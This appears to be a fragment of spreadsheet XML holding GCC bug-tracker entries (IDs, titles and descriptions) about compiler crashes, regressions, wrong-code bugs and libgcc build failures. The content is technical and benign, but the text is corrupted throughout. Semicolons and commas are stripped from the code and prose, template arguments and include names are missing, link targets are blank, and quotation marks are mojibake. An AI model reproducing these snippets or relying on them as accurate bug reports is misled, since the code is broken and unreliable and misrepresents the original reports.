 /esat/olympia/install/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa-lno/../../../../include/c++/3.5-tree-ssa-lno
 /esat/olympia/install/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa-lno/../../../../include/c++/3.5-tree-ssa-lno/i686-pc-linux-gnu
 /esat/olympia/install/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa-lno/../../../../include/c++/3.5-tree-ssa-lno/backward
 /esat/olympia/install/include
 /esat/olympia/install/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa-lno/include
 /usr/include
End of search list.
GNU C++ version 3.5-tree-ssa-lno 20040822 (merged 20040718) (i686-pc-linux-gnu)
        compiled by GNU C version 3.4.1 20040803 (Gentoo Linux 3.4.1-r2
ssp-3.4-2 pie-8.7.6.5).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
matrix3x3.cpp: In function `void printEigenvalues(const double (*)[3])':
matrix3x3.cpp:3: internal compiler error: in peel_address at
tree-ssa-loop-ivopts.c:2854
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-80349</t>
  </si>
  <si>
    <t>[6 Regression] UBSAN: compile time crash with type mismatch in binary expression message</t>
  </si>
  <si>
    <t>Top of the trunk gcc on x86_64
&gt; cat f.cpp
extern const long long int var_20
void foo() { int((var_20  }
&gt; g++ -fsanitize=undefined -w -O0 -c f.cpp
f.cpp: In function â€˜void foo()â€™:
f.cpp:2:6: error: type mismatch in binary expression
 void foo() { int((var_20  }
      ^~~
long long unsigned int
long long int
long long unsigned int
_11 = var_20.2_10 
f.cpp:2:6: internal compiler error: verify_gimple failed
0xdae9ad verify_gimple_in_seq(gimple*)
	../../gcc_svn_intel/gcc/tree-cfg.c:4934
0xafe2bd gimplify_body(tree_node* bool)
	../../gcc_svn_intel/gcc/gimplify.c:12500
0xafe624 gimplify_function_tree(tree_node*)
	../../gcc_svn_intel/gcc/gimplify.c:12590
0x96e9df cgraph_node::analyze()
	../../gcc_svn_intel/gcc/cgraphunit.c:657
0x9719c9 analyze_functions
	../../gcc_svn_intel/gcc/cgraphunit.c:1118
0x972a82 symbol_table::finalize_compilation_unit()
	../../gcc_svn_intel/gcc/cgraphunit.c:2603
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-40741</t>
  </si>
  <si>
    <t>code size explosion for integer comparison</t>
  </si>
  <si>
    <t>Compile following function with options -Os -mthumb -march=armv5te:
int returnbool(int a int b)
{
    if (a &lt; b)
        return 1
    return 0
}
Gcc 4.5 generates:
        lsr     r3 r1 #31
        asr     r2 r0 #31
        cmp     r0 r1
        adc     r2 r2 r3
        mov     r0 r2
        mov     r3 #1
        eor     r0 r0 r3
        @ sp needed for prologue
        bx      lr
while gcc 4.3.1 generates:
        push    {lr}
        mov     r3 #1
        cmp     r0 r1
        blt     .L2
        mov     r3 #0
.L2:
        mov     r0 r3
        @ sp needed for prologue
        pop     {pc}
If we count instructions to do comparison only they are 7 vs 4. I don't know if it is faster to replace one branch instruction with 4 alu instructions. It is definitely a regression for code size.
The long code sequence is generated by expand pass.</t>
  </si>
  <si>
    <t>GCC-48857</t>
  </si>
  <si>
    <t>V2DI arguments are not passed like other vectors</t>
  </si>
  <si>
    <t>Created attachment 24172
Patch to fix the problem
When the VSX extensions were added to the powerpc V2DI mode was added in an afterthought.  The machine does not have native V2DI operations but it is needed to correctly handle vector conversion of DImode to DFmode.  Because there were no native V2DI operations it was not part of VSX_MODE and similar macros.  This caused V2DImode arguments to be passed and returned differently than the other vector types (for -mabi=altivec which is on implicitly for 64-bit).  We should change the compiler so V2DI mode is passed an returned the same as the other vectors.</t>
  </si>
  <si>
    <t>GCC-33168</t>
  </si>
  <si>
    <t>[4.3 Regression] GCC Boot failure building libstc++</t>
  </si>
  <si>
    <t>This time __please__ follow standard procedures instead of doing it like PR33125/PR33126 where the earlier submission was made a duplicate of a later one  . Which then was left unconfirmed for a lengthy period (6+ hours) and never formally closed as resolved leaving the parties hanging.
Using built-in specs.
Target: powerpc-unknown-linux-gnu
Configured with: ../gcc-4.3.0/configure --prefix=/usr --infodir=/usr/share/info --mandir=/usr/share/man --host=powerpc-unknown-linux-gnu --build=powerpc-unknown-linux-gnu --enable-__cxa_atexit --enable-threads=posix --enable-shared --enable-clocale=gnu --enable-bootstrap --enable-languages=cc++fortran --enable-altivec --disable-libssp --disable-decimal-float --disable-libmudflap --disable-nls --disable-werror --disable-multilib --with-ibmlongdouble --with-cpu=G4 --enable-clocale=gnu --with-system-zlib
Thread model: posix
gcc version 4.3.0 20070823 (experimental) (GCC) 
 /usr/libexec/gcc/powerpc-unknown-linux-gnu/4.3.0/cc1plus -E -quiet -nostdinc++ -v -I/var/tmp/43/build-140/powerpc-unknown-linux-gnu/libstdc++-v3/include/powerpc-unknown-linux-gnu -I/var/tmp/43/build-140/powerpc-unknown-linux-gnu/libstdc++-v3/include -I/var/tmp/43/gcc-4.3.0/libstdc++-v3/libsupc++ -iprefix /var/tmp/43/build-140/gcc/../lib/gcc/powerpc-unknown-linux-gnu/4.3.0/ -D_GNU_SOURCE -D__unix__ -D__gnu_linux__ -D__linux__ -Dunix -D__unix -Dlinux -D__linux -Asystem=linux -Asystem=unix -Asystem=posix -D_GNU_SOURCE -isystem /usr/powerpc-unknown-linux-gnu/include -isystem /usr/powerpc-unknown-linux-gnu/sys-include ../gcc-4.3.0/libstdc++-v3/src/system_error.cc -mcpu=G4 -std=gnu++0x -Wall -Wextra -Wwrite-strings -Wcast-qual -fno-implicit-templates -fdiagnostics-show-location=once -ffunction-sections -fdata-sections -fworking-directory -O2 -fpch-preprocess -o system_error.ii
ignoring nonexistent directory /usr/powerpc-unknown-linux-gnu/include
ignoring nonexistent directory /usr/powerpc-unknown-linux-gnu/sys-include
ignoring nonexistent directory /var/tmp/43/build-140/gcc/../lib/gcc/powerpc-unknown-linux-gnu/4.3.0/include
ignoring nonexistent directory /var/tmp/43/build-140/gcc/../lib/gcc/powerpc-unknown-linux-gnu/4.3.0/include-fixed
ignoring nonexistent directory /var/tmp/43/build-140/gcc/../lib/gcc/powerpc-unknown-linux-gnu/4.3.0/../../../../powerpc-unknown-linux-gnu/include
ignoring nonexistent directory /var/tmp/43/build-140/gcc/../lib/gcc/../../lib/gcc/powerpc-unknown-linux-gnu/4.3.0/include
ignoring nonexistent directory /var/tmp/43/build-140/gcc/../lib/gcc/../../lib/gcc/powerpc-unknown-linux-gnu/4.3.0/include-fixed
ignoring nonexistent directory /var/tmp/43/build-140/gcc/../lib/gcc/../../lib/gcc/powerpc-unknown-linux-gnu/4.3.0/../../../../powerpc-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /var/tmp/43/build-140/powerpc-unknown-linux-gnu/libstdc++-v3/include/powerpc-unknown-linux-gnu
 /var/tmp/43/build-140/powerpc-unknown-linux-gnu/libstdc++-v3/include
 /var/tmp/43/gcc-4.3.0/libstdc++-v3/libsupc++
 /usr/include/libffi
 /usr/local/include
 /usr/include
End of search list.
 /usr/libexec/gcc/powerpc-unknown-linux-gnu/4.3.0/cc1plus -fpreprocessed system_error.ii -quiet -dumpbase system_error.cc -mcpu=G4 -auxbase-strip system_error.o -g -O2 -Wall -Wextra -Wwrite-strings -Wcast-qual -std=gnu++0x -version -fno-implicit-templates -fdiagnostics-show-location=once -ffunction-sections -fdata-sections -o system_error.s
GNU C++ (GCC) version 4.3.0 20070823 (experimental) (powerpc-unknown-linux-gnu)
	compiled by GNU C version 4.3.0 20070823 (experimental) GMP version 4.2.1 MPFR version 2.2.1-p5.
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 91efee225a5243299b9fb0dada305fe7
../gcc-4.3.0/libstdc++-v3/src/system_error.cc:67: error: std::system_category causes a section type conflict</t>
  </si>
  <si>
    <t>GCC-2257</t>
  </si>
  <si>
    <t>Problems with slices</t>
  </si>
  <si>
    <t xml:space="preserve">The following source code ts1.C does not compile. When a new style cast
(static_cast) is employed everything is fine but the old style cast
does not work. The code compiles successfully if STLport 4.1b5 is used.
Release:
3.1 20010309 (experimental)
Environment:
System: Linux kiste 2.4.2 #34 Sun Feb 25 20:03:34 CET 2001 i686 unknown
Architecture: i686
SuSE 7.1
Glibc 2.2
GNU ld version 2.10.91 (with BFD 2.10.91.0.4)
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-long-long
How-To-Repeat:
Source code ts1.C
#include 
using namespace std
template
void printValarray (const valarray&amp; va size_t num) {}
int main()
{
    valarray va(12)
    // does compile
    printValarray (static_cast &gt;
                   (sqrt(valarray(va[slice(331)]))) 3)
    // does not compile
    printValarray (sqrt(valarray(va[slice(331)])) 3)
}
Compiling ts1.C
g++ -v -c ts1.C -Wall -save-temps
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-long-long
gcc version 3.1 20010309 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cpp0 -lang-c++ -D_GNU_SOURCE -D__GNUG__=3 -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__STDC_HOSTED__=1 -Wall -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ ts1.C ts1.ii
GNU CPP version 3.1 20010309 (experimental) (cpplib) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-linux-gnu
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/include
 /usr/local/i686-pc-linux-gnu/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cc1plus -fpreprocessed ts1.ii -quiet -dumpbase ts1.C -Wall -version -o ts1.s
GNU CPP version 3.1 20010309 (experimental) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.1 20010309 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 3.1 20010309 (experimental).
ts1.C: In function `int main()':
ts1.C:15: no matching function for call to 
   `printValarray(std::_Expr double&gt; 
   int)'
Bzip2 compressed and uuencoded preprocessed source file ts1.ii
See attachments for ts1.ii.bz2
</t>
  </si>
  <si>
    <t>GCC-37095</t>
  </si>
  <si>
    <t>[4.4 regression] Trouble with covariant return</t>
  </si>
  <si>
    <t>The following valid code snippet fails to compile on mainline when compiled
with -O:
=======================================
struct A
{
  virtual A* foo()
}
struct B : virtual A
{
  virtual B* foo() { return 0 }
}
B b
=======================================
bug.cc:11: error: 'B* *.LTHUNK1()' aliased to undefined symbol '_ZTch0_v0_n32_N1B3fooEv'</t>
  </si>
  <si>
    <t>GCC-69863</t>
  </si>
  <si>
    <t>no_sanitize_address doesn't disable stack instrumentation</t>
  </si>
  <si>
    <t>Attribute no_sanitize_address doesn't disable instrumentation completely.
Apparently no_sanitize_address only disables memory access checks but it 
doesn't have influence on stack redzones. 
Regardless of this attribute gcc creates and poisons/unpoisons stack redzones.
$ cat no_sanitize_stack_test.c 
void g(int *a)
__attribute__((no_sanitize_address))
void func(void)
{
        int a
        g(
}
$ gcc -fsanitize=address -c no_sanitize_stack_test.c &amp;&amp; objdump -d no_sanitize_stack_test.o
0000000000000000 :
....
  4d:   49 c1 ec 03             shr    $0x3%r12
  51:   41 c7 84 24 00 80 ff    movl   $0xf1f1f1f10x7fff8000(%r12)
  58:   7f f1 f1 f1 f1 
  5d:   41 c7 84 24 04 80 ff    movl   $0xf4f4f4040x7fff8004(%r12)
  64:   7f 04 f4 f4 f4 
  69:   41 c7 84 24 08 80 ff    movl   $0xf3f3f3f30x7fff8008(%r12)
  70:   7f f3 f3 f3 f3 
  75:   64 48 8b 14 25 28 00    mov    %fs:0x28%rdx</t>
  </si>
  <si>
    <t>ryabinin.a.a</t>
  </si>
  <si>
    <t>GCC-39118</t>
  </si>
  <si>
    <t>[4.3/4.4 Regression] x86_64 red zone violation</t>
  </si>
  <si>
    <t>This is a bug report for gcc 4_3 branch.  I will attach a test case slightly reduced from zlib code.  When compiling this test case for the x86_64-linux target with -O2 -fomit-frame-pointer I see this at the start of the function:
adler32:
	pushq	%rbp
	movq	%rdi %rax
	andl	$65535 %edi
	shrq	$16 %rax
	movq	%rsp %rbp
	pushq	%r15
	andl	$65535 %eax
	movl	%edx -140(%rbp)
After %rsp was copied to %rbp %r15 was pushed.  So now %rsp is 8 bytes less than %rbp.  The red zone is 128 bytes so this means that any reference down to -136(%rbp) is valid.  However the code actually stores a value into -140(%rbp).  This is invalid and can cause subtle and unpredictable bugs depending upon when the kernel interrupts this code.
This error happens because the scheduler moves this movl instruction ahead of some other pushq instructions.  If all the pushq instructions happened first the stack pointer would have been decremented sufficiently that the reference to -140(%rbp) would be safely within the red zone.
4.4 generates completely different and seemingly better code for this test case.  However I don't see anything in the 4.4 source code which would prevent this same bug from occurring given the right test case.  So this is potentially a serious error for the 4.4 release as well unless it has been fixed by some scheduling dependency that I haven't uncovered.  However I have not been able to find a test case.</t>
  </si>
  <si>
    <t>GCC-50981</t>
  </si>
  <si>
    <t>[4.6 Regression] [OOP] Wrong-code for scalarizing ELEMENTAL call with absent OPTIONAL argument</t>
  </si>
  <si>
    <t>Created attachment 25705
test case
As reported by Andriy Kostyuk
http://gcc.gnu.org/ml/fortran/2011-11/msg00035.html
There is a wrong-code issue with absent OPTIONAL arguments and ELEMENTAL.
It works for me with 4.1 4.3 and
  4.4.0 20090206 (experimental) [trunk revision 143983] (SUSE Linux)
It fails for me with 4.5 4.6 and 4.7
  4.4.6 20110219 (prerelease) [gcc-4_4-branch revision 170290]
and was reported to be broken in
  GNU Fortran (Ubuntu/Linaro 4.4.4-14ubuntu5) 4.4.5
If one looks at the dump one finds:
  ff (real(kind=8) &amp; restrict a integer(kind=4) * b)
  {
  ...
      integer(kind=4) D.1747
    D.1747 = *b
  ...
      while (1)
        {
          if (S.1 &gt; 2) goto L.2
          val.0 = gg (
          S.1 = S.1 + 1
        }
The D.1747 = *b is a rather bad idea if b == NULL.</t>
  </si>
  <si>
    <t>GCC-48197</t>
  </si>
  <si>
    <t>possible wrong code bug at -O0</t>
  </si>
  <si>
    <t>Here gcc's output is the same at all optimization levels.  We think the correct answer for this function is x = 0 because all of the following statements are equivalent:
   x = (long)0 &gt; ((unsigned int)0 ^ (signed short)y)
   x = (long)0 &gt; ((unsigned int)0 ^ (signed short)((int)0x8000))
   x = (long)0 &gt; ((unsigned int)0 ^ (signed short)0x8000)
   x = (long)0 &gt; ((unsigned)0 ^ (unsigned)0x8000)
   x = (long)0 &gt; ((unsigned)0 ^ (unsigned)32768)
   x = (long)0 &gt; (unsigned)32768
   x = (long)0 &gt; (long)32768
   x = 0
[regehr@gamow ~]$ current-gcc -O0 small.c -o small
[regehr@gamow ~]$ ./small
x = 1
[regehr@gamow ~]$ cat small.c
static int x = 0
static int y = 0x8000
int printf(const char *format ...)
int main (void)
{
   x = (long)0 &gt; ((unsigned int)0 ^ (signed short)y)
   printf(x = %d\n x)
   return 0
} 
[regehr@gamow ~]$ current-gcc -v
Using built-in specs.
COLLECT_GCC=current-gcc
COLLECT_LTO_WRAPPER=/uusoc/exports/scratch/regehr/z/compiler-install/gcc-r171139-install/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --with-libelf=/usr/local --enable-lto --prefix=/home/regehr/z/compiler-install/gcc-r171139-install --program-prefix=r171139- --enable-languages=cc++
Thread model: posix
gcc version 4.7.0 20110318 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-32100</t>
  </si>
  <si>
    <t>[4.2/4.3 Regression] vrp bitfield miscompilation</t>
  </si>
  <si>
    <t>// Kudos to Yuriy Tsibizov for doing all dirty work hunting down miscompilation
// of snd_emu10k1 driver in FreeBSD -CURRENT
// small testcase compile with -O1 -ftree-vrp
void abort (void)
struct T
{
  int b : 1
} t
void __attribute__((noinline)) foo (int f)
{
  t.b = (f 
}
int main (void)
{
  foo (0x10)
  if (!t.b)
    abort ()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-49804</t>
  </si>
  <si>
    <t>[4.7 regression] 20110709 to 20110716 on sparc64 freebsd9.0 Configuration mismatch! [libgcc-extra-parts] Error</t>
  </si>
  <si>
    <t>On ia64 sparc64 freebsd9.0 I've installed gcc-4.7.0.20110709
Both arches fail to build 4.7.0.20110716.
On ia64:
Checking multilib configuration for libgcc...
gmake[3]: Entering directory `/usr/ports/lang/gcc47/work/build/ia64-portbld-freebsd9.0/libgcc'
# If this is the top-level multilib build all the other
# multilibs.
rm -f libgcc.a
objects=__divxf3.o __divdf3.o __divsf3.o __divdi3.o __moddi3.o __udivdi3.o __umoddi3.o
+__divsi3.o
__modsi3.o __udivsi3.o __umodsi3.o __save_stack_nonlocal.o __nonlocal_goto.o
+__restore_stack_nonloc
al.o __trampoline.o _fixtfdi.o _fixunstfdi.o _floatditf.o _muldi3.o _negdi2.o _lshrdi3.o
+_ashldi3.o
 _ashrdi3.o _cmpdi2.o _ucmpdi2.o _clear_cache.o _trampoline.o __main.o _absvsi2.o _absvdi2.o
+_addvs
i3.o _addvdi3.o _subvsi3.o _subvdi3.o _mulvsi3.o _mulvdi3.o _negvsi2.o _negvdi2.o _ctors.o
+_ffssi2.
o _ffsdi2.o _clz.o _clzsi2.o _clzdi2.o _ctzsi2.o _ctzdi2.o _popcount_tab.o _popcountsi2.o
+_popcount
di2.o _paritysi2.o _paritydi2.o _powisf2.o _powidf2.o _powixf2.o _powitf2.o _mulsc3.o _muldc3.o
+_mu
lxc3.o _multc3.o _divsc3.o _divdc3.o _divxc3.o _divtc3.o _bswapsi2.o _bswapdi2.o _clrsbsi2.o
+_clrsb
di2.o _fixunssfsi.o _fixunsdfsi.o _fixunsxfsi.o _fixsfdi.o _fixdfdi.o _fixxfdi.o _fixunssfdi.o
+_fix
unsdfdi.o _fixunsxfdi.o _floatdisf.o _floatdidf.o _floatdixf.o _floatundisf.o _floatundidf.o
+_float
undixf.o _floatunditf.o _eprintf.o __gcc_bcmp.o _divdi3.o _moddi3.o _udivdi3.o _umoddi3.o
+_udiv_w_s
div.o _udivmoddi4.o enable-execute-stack.o                                   \
if test -z $objects then                             \
  echo 'int __libgcc_eh_dummy' &gt; eh_dummy.c           \
  /usr/ports/lang/gcc47/work/build/./gcc/xgcc -B/usr/ports/lang/gcc47/work/build/./gcc/
+-B/usr/loca
l/ia64-portbld-freebsd9.0/bin/ -B/usr/local/ia64-portbld-freebsd9.0/lib/ -isystem
+/usr/local/ia64-p
ortbld-freebsd9.0/include -isystem /usr/local/ia64-portbld-freebsd9.0/sys-include    -g -O2 -pipe
+-
I/usr/local/include -fno-strict-aliasing -O2  -g -O2 -pipe -I/usr/local/include
+-fno-strict-aliasin
g -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes
+-Wold-st
yle-definition  -isystem ./include   -fPIC -pthread -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2
+-fbuilding-
libgcc -fno-stack-protector   -I. -I. -I../.././gcc -I../.././../gcc-4.7-20110716/libgcc
+-I../.././
../gcc-4.7-20110716/libgcc/. -I../.././../gcc-4.7-20110716/libgcc/../gcc
+-I../.././../gcc-4.7-20110
716/libgcc/../include  -DHAVE_CC_TLS  -fvisibility=hidden -DHIDE_EXPORTS -c eh_dummy.c          \
     -o eh_dummy.o                             \
  objects=eh_dummy.o                           \
fi                                                     \
/usr/local/ia64-portbld-freebsd9.0/bin/ar  rc libgcc.a $objects
/usr/local/ia64-portbld-freebsd9.0/bin/ranlib libgcc.a
# If the gcc directory specifies which extra parts to
# build for this target and the libgcc configuration also
# specifies make sure they match.  This can be removed
# when the gcc directory no longer holds libgcc configuration
# it is useful when migrating a target.
Configuration mismatch!
Extra parts from gcc directory: crtbegin.o crtbeginS.o crtend.o crtendS.o
Extra parts from libgcc: crtbegin.o crtend.o crtbeginS.o crtendS.o crtfastmath.o
exit 1
gmake[3]: *** [libgcc-extra-parts] Error 1
On sparc64:
Checking multilib configuration for libgcc...
gmake[3]: Entering directory `/usr/ports/lang/gcc47/work/build/sparc64-portbld-freebsd9.0/libgcc'
# If this is the top-level multilib build all the other
# multilibs.
gmake[4]: Entering directory `/usr/ports/lang/gcc47/work/build/sparc64-portbld-freebsd9.0/libgcc'
if [ -z  ] then \
  true \
else \
  rootpre=`${PWDCMD-pwd}`/ export rootpre \
  srcrootpre=`cd ../.././../gcc-4.7-20110716/libgcc ${PWDCMD-pwd}`/ export srcrootpre \
  lib=`echo ${rootpre} | sed -e 's^.*/\([^/][^/]*\)/$\1'` \
  compiler=/usr/ports/lang/gcc47/work/build/./gcc/xgcc -B/usr/ports/lang/gcc47/work/build/./gcc/
+-B/usr/local/sparc64-portbld-freebsd
9.0/bin/ -B/usr/local/sparc64-portbld-freebsd9.0/lib/ -isystem
+/usr/local/sparc64-portbld-freebsd9.0/include -isystem /usr/local/sparc
64-portbld-freebsd9.0/sys-include    \
  for i in `${compiler} --print-multi-lib 2&gt;/dev/null` do \
    dir=`echo $i | sed -e 's/.*$//'` \
    if [ ${dir} = . ] then \
      true \
    else \
      if [ -d ../${dir}/${lib} ] then \
        flags=`echo $i | sed -e 's/^[^]*//' -e 's/@/ -/g'` \
        if (cd ../${dir}/${lib} gmake AR=/usr/local/sparc64-portbld-freebsd9.0/bin/ar
+AR_FLAGS=rc CC=/usr/ports/lang/gcc47/work/
build/./gcc/xgcc -B/usr/ports/lang/gcc47/work/build/./gcc/
+-B/usr/local/sparc64-portbld-freebsd9.0/bin/ -B/usr/local/sparc64-portbld-f
reebsd9.0/lib/ -isystem /usr/local/sparc64-portbld-freebsd9.0/include -isystem
+/usr/local/sparc64-portbld-freebsd9.0/sys-include    
CFLAGS=-g -O2 -pipe -I/usr/local/include -fno-strict-aliasing DESTDIR= EXTRA_OFILES=
+HDEFINES= INSTALL=/usr/bin/install -c -o
root -g wheel INSTALL_DATA=install  -o root -g wheel -m 444 INSTALL_PROGRAM=install  -s -o
+root -g wheel -m 555 LDFLAGS= LOADL
IBES= RANLIB=/usr/local/sparc64-portbld-freebsd9.0/bin/ranlib SHELL=/bin/sh
+prefix=/usr/local exec_prefix=/usr/local libdir=
/usr/local/lib/gcc47 libsubdir=/usr/local/lib/gcc47/gcc/sparc64-portbld-freebsd9.0/4.7.0
+tooldir=/usr/local/sparc64-portbld-freebs
d9.0 \
                        CFLAGS=-g -O2 -pipe -I/usr/local/include -fno-strict-aliasing ${flags}
+\
                        CCASFLAGS= ${flags} \
                        FCFLAGS= ${flags} \
                        FFLAGS= ${flags} \
                        ADAFLAGS= ${flags} \
                        prefix=/usr/local \
                        exec_prefix=/usr/local \
                        GCJFLAGS= ${flags} \
                        GOCFLAGS=-O2 -g ${flags} \
                        CXXFLAGS=-g -O2 -pipe -I/usr/local/include -fno-strict-aliasing
+${flags} \
                        LIBCFLAGS=-g -O2 -pipe -I/usr/local/include -fno-strict-aliasing
+${flags} \
                        LIBCXXFLAGS=-g -O2 -pipe -I/usr/local/include -fno-strict-aliasing
+-fno-implicit-templates ${flags} \
                        LDFLAGS= ${flags} \
                        MULTIFLAGS=${flags} \
                        DESTDIR= \
                        INSTALL=/usr/bin/install -c -o root -g wheel \
                        INSTALL_DATA=install  -o root -g wheel -m 444 \
                        INSTALL_PROGRAM=install  -s -o root -g wheel -m 555 \
                        INSTALL_SCRIPT=install  -o root -g wheel -m 555 \
                        all) then \
          true \
        else \
          exit 1 \
        fi \
      else true \
      fi \
    fi \
  done \
fi
gmake[4]: Leaving directory `/usr/ports/lang/gcc47/work/build/sparc64-portbld-freebsd9.0/libgcc'
# If the gcc directory specifies which extra parts to
# build for this target and the libgcc configuration also
# specifies make sure they match.  This can be removed
# when the gcc directory no longer holds libgcc configuration
# it is useful when migrating a target.
Configuration mismatch!
Extra parts from gcc directory: crtbegin.o crtbeginS.o crtend.o crtendS.o
Extra parts from libgcc: crtfastmath.o
exit 1
gmake[3]: *** [libgcc-extra-parts] Error 1</t>
  </si>
  <si>
    <t>GCC-82930</t>
  </si>
  <si>
    <t>[C++17] ICE: in is_normal_capture_proxy at cp/lambda.c:288 with structured binding in a lambda function with auto typed arguments</t>
  </si>
  <si>
    <t>Created attachment 42572
The test case that triggers `internal compiler error: in is_normal_capture_proxy at cp/lambda.c:288'
Hi.
This could be related to others ICEs with structured bindings but the thrown internal compiler error is at a different location and couldn't find anyone else having hit this particular spot.
Attached a test case. Running it with (pretty much) the latest trunk (2017-11-09) currently gives:
$ aarch64-none-elf-g++.exe -Wall -Wextra -c --std=gnu++17 ice_is_normal_capture_proxy.cpp
ice_is_normal_capture_proxy.cpp: In lambda function:
ice_is_normal_capture_proxy.cpp:17:8: internal compiler error: in is_normal_capture_proxy at cp/lambda.c:288
    eat(left)
Any lambda (capturing or not) with an auto typed parameter will fail if any of the structured binding result is used. It doesn't matter if the auto typed argument is actually used or or whether or not the the code at lambda call site would actually compile e.g. trying to call the lambda without any arguments.
The test case compiles just fine if the auto type is replaced with some other type say an int (-DNO_AUTO_ARG).</t>
  </si>
  <si>
    <t>pexu</t>
  </si>
  <si>
    <t>GCC-53661</t>
  </si>
  <si>
    <t>[gcc-4.7/4.8 regression] Wrong narrowing conversion warning with -std=c++11</t>
  </si>
  <si>
    <t>test.cc
enum Code {
  SUCCESS = 0
}
Code a
int r[] = {a}
$ g++ test.cc -c -std=c++11
test.cc:7:13:warning: narrowing conversion of â€˜aâ€™ from â€˜Codeâ€™ to â€˜intâ€™ inside { } [-Wnarrowing]
 int r[] = {a}</t>
  </si>
  <si>
    <t>GCC-8741</t>
  </si>
  <si>
    <t>[3.2/3.3 regression] gcj crashes when compiling the attached file</t>
  </si>
  <si>
    <t>gcj crashes with the following message when compiling the attached file:
| DoubleOrderedMap.java: In class `org.apache.commons.collections.DoubleOrderedMap$11':
| DoubleOrderedMap.java: In method `access$0(org.apache.commons.collections.DoubleOrderedMap$11)':
| DoubleOrderedMap.java:2052: internal error: Segmentation fault
| Please submit a full bug report
| with preprocessed source if appropriate.
Release:
gcc 3.2
Environment:
Red Hat Linux 8.0
How-To-Repeat:
gunzip DoubleOrderedMap.java.gz # attached
gcj DoubleOrderedMap.java</t>
  </si>
  <si>
    <t>GCC-22233</t>
  </si>
  <si>
    <t>[3.4 regression] ICE with wrong number of template parameters</t>
  </si>
  <si>
    <t>The following invalid code snippet causes an ICE since GCC 3.3:
==============================================
template struct A
{
  void foo()
}
template void A::foo() {}
A a
==============================================
bug.cc:6: error: got 2 template parameters for `void A &gt;::foo()'
bug.cc:6: error:   but 1 required
bug.cc: In instantiation of `A':
bug.cc:8:   instantiated from here
bug.cc:6: internal compiler error: tree check: accessed elt 2 of tree_vec with 
   1 elts in tsubst at cp/pt.c:6707
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-57662</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE: SIGSEGV in code_motion_process_successors with -fschedule-insns2 -fselective-scheduling2</t>
  </si>
  <si>
    <t>Created attachment 30327
reduced testcase
Compiler output:
$ gcc -O -fno-guess-branch-probability -fpeel-loops -freorder-blocks-and-partition -fschedule-insns2 -fsel-sched-pipelining -fselective-scheduling2 -ftree-pre testcase.c
testcase.c: In function 'GetHangarNum':
testcase.c:44:1: internal compiler error: Segmentation fault
 }
 ^
0xa4ce7f crash_signal
        /mnt/svn/gcc-trunk/gcc/toplev.c:333
0xa100f9 code_motion_process_successors
        /mnt/svn/gcc-trunk/gcc/sel-sched.c:6429
0xa100f9 code_motion_path_driver
        /mnt/svn/gcc-trunk/gcc/sel-sched.c:6669
0xa13f87 move_op
        /mnt/svn/gcc-trunk/gcc/sel-sched.c:6758
0xa13f87 move_exprs_to_boundary
        /mnt/svn/gcc-trunk/gcc/sel-sched.c:5292
0xa13f87 schedule_expr_on_boundary
        /mnt/svn/gcc-trunk/gcc/sel-sched.c:5504
0xa15e77 fill_insns
        /mnt/svn/gcc-trunk/gcc/sel-sched.c:5646
0xa15e77 schedule_on_fences
        /mnt/svn/gcc-trunk/gcc/sel-sched.c:7410
0xa15e77 sel_sched_region_2
        /mnt/svn/gcc-trunk/gcc/sel-sched.c:7544
0xa19c44 sel_sched_region_1
        /mnt/svn/gcc-trunk/gcc/sel-sched.c:7583
0xa19c44 sel_sched_region(int)
        /mnt/svn/gcc-trunk/gcc/sel-sched.c:7684
0xa1b3b9 run_selective_scheduling()
        /mnt/svn/gcc-trunk/gcc/sel-sched.c:7760
0x9ec8b5 rest_of_handle_sched2
        /mnt/svn/gcc-trunk/gcc/sched-rgn.c:3606
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ gcc -v
Using built-in specs.
COLLECT_GCC=/mnt/svn/gcc-trunk/binary-latest/bin/gcc
COLLECT_LTO_WRAPPER=/mnt/svn/gcc-trunk/binary-200224-lto-fortran-checking-yes-rtl-df/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
